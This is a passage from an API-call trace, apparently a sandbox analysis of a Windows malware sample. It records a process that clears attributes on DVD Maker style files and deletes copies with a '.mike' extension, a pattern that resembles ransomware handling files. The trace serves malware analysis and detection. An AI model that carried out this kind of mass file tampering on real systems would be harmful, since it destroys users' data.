lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.388] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png", dwFileAttributes=0x80) returned 0 [0056.388] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\vintage.png.mike")) returned 1 [0056.390] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0056.390] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0056.390] CoTaskMemFree (pv=0x4e1c10) [0056.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0056.398] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.403] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png", dwFileAttributes=0x80) returned 0 [0056.403] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\720x480blacksquare.png.mike")) returned 1 [0056.405] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.408] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png", dwFileAttributes=0x80) returned 0 [0056.409] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttonicon.png.mike")) returned 1 [0056.410] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.413] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png", dwFileAttributes=0x80) returned 0 [0056.413] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttoniconsubpictur.png.mike")) returned 1 [0056.415] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.498] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv", dwFileAttributes=0x80) returned 0 [0056.498] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop.wmv.mike")) returned 1 [0056.502] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.587] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv", dwFileAttributes=0x80) returned 0 [0056.588] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop_pal.wmv.mike")) returned 1 [0056.592] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.596] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png", dwFileAttributes=0x80) returned 0 [0056.596] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttonicon.png.mike")) returned 1 [0056.597] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.601] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png", dwFileAttributes=0x80) returned 0 [0056.601] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttoniconsubpict.png.mike")) returned 1 [0056.603] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.608] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png", dwFileAttributes=0x80) returned 0 [0056.608] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\performance.png.mike")) returned 1 [0056.610] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.613] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png", dwFileAttributes=0x80) returned 0 [0056.614] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Mask1.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_mask1.png.mike")) returned 1 [0056.615] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.619] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png", dwFileAttributes=0x80) returned 0 [0056.619] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_subpicture1.png.mike")) returned 1 [0056.621] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.625] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png", dwFileAttributes=0x80) returned 0 [0056.625] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttonicon.png.mike")) returned 1 [0056.627] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.630] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png", dwFileAttributes=0x80) returned 0 [0056.631] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttoniconsubpi.png.mike")) returned 1 [0056.632] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.635] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png", dwFileAttributes=0x80) returned 0 [0056.636] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\redmenu.png.mike")) returned 1 [0056.637] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.696] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv", dwFileAttributes=0x80) returned 0 [0056.696] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\scene_loop.wmv.mike")) returned 1 [0056.700] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.770] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv", dwFileAttributes=0x80) returned 0 [0056.770] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\scene_loop_pal.wmv.mike")) returned 1 [0056.775] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.779] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png", dwFileAttributes=0x80) returned 0 [0056.779] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonicon.png.mike")) returned 1 [0056.780] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.783] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png", dwFileAttributes=0x80) returned 0 [0056.784] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonsubpicture.png.mike")) returned 1 [0056.785] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.990] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv", dwFileAttributes=0x80) returned 0 [0056.990] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv.mike")) returned 1 [0056.995] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.245] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv", dwFileAttributes=0x80) returned 0 [0057.246] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv.mike")) returned 1 [0057.254] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.326] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv", dwFileAttributes=0x80) returned 0 [0057.326] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes.wmv.mike")) returned 1 [0057.330] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.409] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv", dwFileAttributes=0x80) returned 0 [0057.409] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes_pal.wmv.mike")) returned 1 [0057.413] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.482] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv", dwFileAttributes=0x80) returned 0 [0057.482] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene.wmv.mike")) returned 1 [0057.486] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.557] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv", dwFileAttributes=0x80) returned 0 [0057.557] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene_pal.wmv.mike")) returned 1 [0057.561] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.566] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png", dwFileAttributes=0x80) returned 0 [0057.566] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\usercontent_16x9_imagemask.png.mike")) returned 1 [0057.568] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.572] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png", dwFileAttributes=0x80) returned 0 [0057.572] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\whitemenu.png.mike")) returned 1 [0057.573] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0057.573] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0057.573] CoTaskMemFree (pv=0x4e1c10) [0057.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0057.581] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.611] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv", dwFileAttributes=0x80) returned 0 [0057.611] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg.wmv.mike")) returned 1 [0057.614] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.651] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv", dwFileAttributes=0x80) returned 0 [0057.651] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg_pal.wmv.mike")) returned 1 [0057.653] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.743] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv", dwFileAttributes=0x80) returned 0 [0057.744] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg.wmv.mike")) returned 1 [0057.750] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.849] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv", dwFileAttributes=0x80) returned 0 [0057.850] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg_pal.wmv.mike")) returned 1 [0057.855] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.859] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png", dwFileAttributes=0x80) returned 0 [0057.859] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-over-select.png.mike")) returned 1 [0057.860] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.864] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png", dwFileAttributes=0x80) returned 0 [0057.864] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-static.png.mike")) returned 1 [0057.865] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.871] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png", dwFileAttributes=0x80) returned 0 [0057.872] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-next-over-select.png.mike")) returned 1 [0057.873] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.876] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png", dwFileAttributes=0x80) returned 0 [0057.877] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-next-static.png.mike")) returned 1 [0057.878] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.882] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png", dwFileAttributes=0x80) returned 0 [0057.882] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-over-dot.png.mike")) returned 1 [0057.883] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0057.887] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png", dwFileAttributes=0x80) returned 0 [0057.887] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-over-select.png.mike")) returned 1 [0057.888] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, 